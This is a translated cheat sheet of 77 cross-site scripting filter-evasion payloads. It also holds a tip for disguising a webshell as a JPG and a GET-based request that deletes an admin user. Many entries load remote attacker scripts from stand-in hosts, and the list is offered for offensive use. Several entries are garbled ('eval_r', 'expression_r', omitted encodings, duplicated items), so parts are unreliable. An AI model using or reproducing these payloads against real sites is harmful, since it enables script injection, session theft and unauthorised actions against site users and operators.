Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Put this code in the first line of the webshell ("horse"), then change the file to JPG image format. When the image-format shell is accessed, our shell still executes.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective on domestic sites, because there is nowhere they can be exploited.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32 & 34 & 39 & 160 & 8192-8 & 13 & 12288 & 65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>